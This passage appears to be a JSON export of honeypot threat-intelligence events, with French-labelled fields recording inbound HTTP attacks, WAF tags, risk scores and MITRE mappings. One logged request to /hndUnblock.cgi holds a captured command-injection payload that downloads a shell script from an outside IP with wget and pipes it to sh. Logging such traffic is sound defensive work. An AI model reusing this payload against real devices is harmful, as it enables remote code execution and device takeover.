\u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]","anomalies":"[]","severity":10,"bytes_in":426},{"id":11809358,"ip":"45.153.34.219","ts":"2026-07-14 02:18:13.000000","proto":"tcp","src_port":55270,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":72,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/JNAP\/","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00221590bac5c7d7e8540ab87881f47e89fa381ce665\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 461, \u0022payload_entropy\u0022: 5.346572263035492, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022369ab1290b3d1e809a53f13ff893aa2c396436ae\u0022, \u0022event_fingerprint\u0022: \u002246be7d8f39f80a261149ebffcf4c1aeb91d4c093\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022836af405011f3c53b2ada6c413e3014b\u0022, \u0022path_pattern_hash\u0022: \u002209d793525e81db3cecc4e36c738b6310\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-2\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\/network\/Diagnostics\\r\\nContent-Length: 269\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022JNAP\\\u0022:{\\\u0022action\\\u0022:\\\u0022http:\/\/linksys.com\/jnap\/network\/Diagnostics\\\u0022,\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-2\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\/network\/Diagnostics\\r\\nContent-Length: 269\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022JNAP\\\u0022:{\\\u0022action\\\u0022:\\\u0022http:\/\/linksys.com\/jnap\/network\/Diagnostics\\\u0022,\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022dfac93c92d9b08f6846afd71fe2d79a9b615c198\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 11 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]","anomalies":"[]","severity":10,"bytes_in":461},{"id":11809346,"ip":"45.153.34.219","ts":"2026-07-14 02:18:12.000000","proto":"tcp","src_port":55116,"dst_port":82,"service":"http","classification":"http_smuggling_probe","waf_score":41,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/hndUnblock.cgi","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u0022b49e2ce11732566567c2a35c365676c189916029\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 442, \u0022payload_entropy\u0022: 5.321799516017583, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 79, \u0022tag_count\u0022: 9, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00225b5d8264b1c81c752e8a95989a00b252f12df782\u0022, \u0022event_fingerprint\u0022: \u002251733e99d53797cd460d53530f07b2b47fdc5d3e\u0022, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022confidence\u0022: 0.95, \u0022classification_confidence\u0022: 0.95, \u0022precision_score\u0022: 84, \u0022precision_signals\u0022: [\u0022pat-0842\u0022], \u0022kb_rule_ids\u0022: [\u0022pat-0842\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 79}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 95.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022558aaff54ec0336e8a9df2568532ed3b\u0022, \u0022path_pattern_hash\u0022: \u00227e7da887259ec686429949e3a182bb9c\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 79}, \u0022payload_preview\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConnec\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/hndUnblock.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConnection: close\\r\\n\\r\\nttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lunblk%3Bbusybox%20wget%20http:\/\u0022, \u0022payload_snippet\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConnec\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/hndUnblock.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConnection: close\\r\\n\\r\\nttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lunblk%3Bbusybox%20wget%20http:\/\u0022, \u0022payload_snippet\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConnec\u0022, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022web_injection\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002256103ae1ebdb76a15d4dcb4bbb6cd76baafca87a\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/hndUnblock.cgi\u0022, \u0022request_line\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConnec\u0022, \u0022attack_vector\u0022: \u0022http smuggling probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/hndUnblock.cgi\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 Motif catalogue confirm\u00e9 \u00b7 6 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 79\/100 (\u00c9lev\u00e9) \u2014 MITRE TA0001 \u2014 confiance 95 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 95, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 79}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 79, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022pat-0842\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022pat-0842\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/hndUnblock.cgi\u0022, \u0022request_line\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022http smuggling probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/hndUnblock.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 